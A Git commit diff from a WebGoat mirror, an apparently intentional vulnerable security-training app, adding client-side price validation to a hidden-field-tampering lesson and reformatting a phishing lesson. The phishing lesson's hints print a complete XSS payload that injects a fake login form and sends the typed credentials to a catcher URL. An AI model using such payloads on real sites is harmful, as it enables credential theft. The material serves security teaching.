dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added client side validation to HiddenFieldTampering.java, added a new ECS makeButton with a OnClick function, corrected authorship in several files

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk@220 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64 2008-01-09 13:28:07 +00:00
parent 3645564018
commit 84ca966ce5
9 changed files with 1354 additions and 1336 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
View File

@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
* site</a> (this lesson is heavily based on Jeff Williams' SQL * site</a> (this lesson is heavily based on Bruce Mayhews' SQL
* Injection lesson * Injection lesson
* @created January 14, 2005 * @created January 14, 2005
*/ */

4
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
View File

@ -53,8 +53,8 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class DOS_Login extends LessonAdapter public class DOS_Login extends LessonAdapter
{ {

332
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
View File

@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
import java.util.ArrayList; import java.util.ArrayList;
import java.util.List; import java.util.List;
import java.util.regex.Pattern;
import org.apache.ecs.Element; import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer; import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.A; import org.apache.ecs.html.A;
import org.apache.ecs.html.B; import org.apache.ecs.html.B;
import org.apache.ecs.html.BR; import org.apache.ecs.html.BR;
@ -48,191 +50,193 @@ import org.owasp.webgoat.session.WebSession;
* for free software projects. * for free software projects.
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @created October 28, 2003 * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
*/ * @created October 28, 2003
*/
public class HiddenFieldTampering extends LessonAdapter public class HiddenFieldTampering extends LessonAdapter
{ {
public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); public final static A ASPECT_LOGO =
new A().setHref("http://www.aspectsecurity.com").addElement(
private final static String PRICE = "Price"; new IMG("images/logos/aspect.jpg")
.setAlt("Aspect Security").setBorder(0)
.setHspace(0).setVspace(0));
private final static String PRICE_TV = "2999.99"; private final static String PRICE = "Price";
private final static String PRICE_TV_HACKED = "9.99"; private final static String PRICE_TV = "2999.99";
private final static String PRICE_TV_HACKED = "9.99";
/** String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit!
* Constructor for the HiddenFieldScreen object Pattern pattern1 = Pattern.compile(regex);
*/ String lineSep = System.getProperty("line.separator");
public HiddenFieldTampering() String script =
{} "<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
/**
/** * Constructor for the HiddenFieldScreen object
* Description of the Method */
* public HiddenFieldTampering()
* @param s Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{ {
String price = s.getParser().getRawParameter(PRICE, PRICE_TV);
float quantity = s.getParser().getFloatParameter("QTY", 1.0f);
float total = quantity * Float.parseFloat(price);
if (price.equals(PRICE_TV))
{
ec.addElement(new Center().addElement(new H1()
.addElement("Shopping Cart ")));
ec.addElement(new BR());
Table t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(1).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
TR tr = new TR();
tr.addElement(new TH().addElement(
"Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Price:").setWidth("10%"));
tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
tr.addElement(new TH().addElement("Total").setWidth("7%"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD()
.addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement(
new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total));
t.addElement(tr);
ec.addElement(t);
t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
ec.addElement(new BR());
tr = new TR();
tr.addElement(new TD()
.addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Purchase")));
t.addElement(tr);
ec.addElement(t);
Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
ec.addElement(input);
ec.addElement(new BR());
}
else
{
if (!price.toString().equals(PRICE_TV))
{
makeSuccess(s);
}
ec.addElement(new P().addElement("Your total price is:"));
ec.addElement(new B("$" + total));
ec.addElement(new BR());
ec
.addElement(new P()
.addElement("This amount will be charged to your credit card immediately."));
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
} }
return (ec); /**
} * Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new StringElement(script));
float quantity;
float total;
String price = PRICE_TV;
try
{
price = s.getParser().getRawParameter(PRICE, PRICE_TV);
quantity = s.getParser().getFloatParameter("QTY", 1.0f);
total = quantity * Float.parseFloat(price);
}
catch (Exception e)
{
s.setMessage("Invaild data " + this.getClass().getName());
price = PRICE_TV;
quantity = 1.0f;
total = quantity * Float.parseFloat(PRICE_TV);
}
/** if (price.equals(PRICE_TV))
* DOCUMENT ME! {
* ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
* @return DOCUMENT ME! ec.addElement(new BR());
*/ Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
protected Category getDefaultCategory()
{
return Category.UNVALIDATED_PARAMETERS;
}
if (s.isColor())
{
t.setBorder(1);
}
/** TR tr = new TR();
* Gets the hints attribute of the HiddenFieldScreen object tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
* tr.addElement(new TH().addElement("Price:").setWidth("10%"));
* @return The hints value tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
*/ tr.addElement(new TH().addElement("Total").setWidth("7%"));
protected List<String> getHints(WebSession s) t.addElement(tr);
{
List<String> hints = new ArrayList<String>();
hints
.add("This application is using hidden fields to transmit price information to the server.");
hints
.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
return hints; tr = new TR();
} tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total));
t.addElement(tr);
ec.addElement(t);
/** t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
* Gets the instructions attribute of the HiddenFieldTampering object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions); if (s.isColor())
} {
t.setBorder(1);
}
private final static Integer DEFAULT_RANKING = new Integer(50); ec.addElement(new BR());
tr = new TR();
tr.addElement(new TD().addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
t.addElement(tr);
ec.addElement(t);
protected Integer getDefaultRanking() Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
{ ec.addElement(input);
return DEFAULT_RANKING; ec.addElement(new BR());
}
} else
{
if (!price.toString().equals(PRICE_TV))
{
makeSuccess(s);
}
/** ec.addElement(new P().addElement("Your total price is:"));
* Gets the title attribute of the HiddenFieldScreen object ec.addElement(new B("$" + total));
* ec.addElement(new BR());
* @return The title value ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
*/ }
public String getTitle()
{ return (ec);
return ("Exploit Hidden Fields"); }
}
/**
public Element getCredits() * DOCUMENT ME!
{ *
return super.getCustomCredits("", ASPECT_LOGO); * @return DOCUMENT ME!
} */
protected Category getDefaultCategory()
{
return Category.UNVALIDATED_PARAMETERS;
}
/**
* Gets the hints attribute of the HiddenFieldScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("This application is using hidden fields to transmit price information to the server.");
hints.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
return hints;
}
/**
* Gets the instructions attribute of the HiddenFieldTampering object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions =
"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(50);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HiddenFieldScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Exploit Hidden Fields");
}
public Element getCredits()
{
return super.getCustomCredits("", ASPECT_LOGO);
}
} }

4
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
View File

@ -39,8 +39,8 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HttpBasics extends LessonAdapter public class HttpBasics extends LessonAdapter
{ {

446
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
View File

@ -48,235 +48,251 @@ import org.owasp.webgoat.session.WebSession;
* for free software projects. * for free software projects.
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created March 13, 2007 * @created March 13, 2007
*/ */
public class Phishing extends LessonAdapter public class Phishing extends LessonAdapter
{ {
/** /**
* Description of the Field * Description of the Field
*/ */
protected final static String SEARCH = "Username"; protected final static String SEARCH = "Username";
private String searchText; private String searchText;
/**
* Description of the Method
*
* @param s Description of the Parameter
* @return Description of the Return Value
*/
private boolean postedCredentials(WebSession s)
{
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
//<START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
//<END_OMIT_SOURCE>
}
/**
* Description of the Method
*
* @param s Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
searchText = s.getParser().getRawParameter(SEARCH,"");
//<START_OMIT_SOURCE>
//<END_OMIT_SOURCE>
ec.addElement(makeSearch(s));
if (postedCredentials(s))
{
makeSuccess(s);
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
return (ec);
}
protected Element makeSearch(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
.setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
tr = new TR();
tr
.addElement(new TH()
.addElement(
"This facility will search the WebGoat source.")
.setColSpan(2).setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints
.add("Try adding HTML to the search field to create a fake authentication form.<BR>" +
"Try to make the form look official.");
hints.add("Try: <BR> " +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Add functionality that can post a request, a button might work<BR><BR>" +
"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" +
"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints.add("Try: <BR> " +
"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot;&gt;"+
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Make the button perform an action on submit, <BR>" +
"adding an onclick=\"hack()\" might work<BR>"+
"Don't forget to add the hack() javascript function" +
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("You need to create the hack() function. This function will pull the credentials from the " +
"webpage and post them to the WebGoat catcher servlet. <BR>" +
"<BR> Some useful code snippets:<UL>" +
"<LI>doucument.forms[0].user.value - will access the user field" +
"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
"<LI>javascript string concatentation uses a \"+\" </UL>" +
"<BR><BR>Solution for this hint():<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;");
hints.add("Complete solution for this lesson:<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/** /**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!-- * Description of the Method
* *
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/ */
return hints; private boolean postedCredentials(WebSession s)
} {
/** String postedToCookieCatcher =
* Gets the instructions attribute of the XssSearch object getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" +
"Below is an example of a standard search feature.<br>" +
"Using XSS and HTML insertion, your goal is to: <UL>" +
"<LI>Insert html to that requests credentials" +
"<LI>Add javascript to actually collect the credentials" +
"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " +
"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions); // <START_OMIT_SOURCE>
} return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE>
}
private final static Integer DEFAULT_RANKING = new Integer(30); /**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
searchText = s.getParser().getRawParameter(SEARCH, "");
// <START_OMIT_SOURCE>
// <END_OMIT_SOURCE>
protected Integer getDefaultRanking() ec.addElement(makeSearch(s));
{ if (postedCredentials(s))
return DEFAULT_RANKING; {
} makeSuccess(s);
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
return (ec);
}
/** protected Element makeSearch(WebSession s)
* Gets the category attribute of the FailOpenAuthentication object {
* ElementContainer ec = new ElementContainer();
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
tr = new TR();
tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real
* attack... Your credentials were just stolen.\nUser Name = " +
* document.forms(0).user.value + "\nPassword = " +
* document.forms(0).pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2>
* <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
*
*/
return hints;
}
/**
* Gets the instructions attribute of the XssSearch object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions =
"This lesson is an example of how a website might support a phishing attack<BR><BR>"
+ "Below is an example of a standard search feature.<br>"
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the category attribute of the FailOpenAuthentication object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
} }

4
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
View File

@ -41,8 +41,8 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class UserAdminScreen extends LessonAdapter public class UserAdminScreen extends LessonAdapter
{ {

4
webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java
View File

@ -419,8 +419,8 @@ public class Course
} }
if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
{ {
System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName()); //System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
System.out.println("fileName: " + fileName + " == className: " + className ); //System.out.println("fileName: " + fileName + " == className: " + className );
lesson.setLessonSolutionFileName(absoluteFile); lesson.setLessonSolutionFileName(absoluteFile);
} }
} }

9
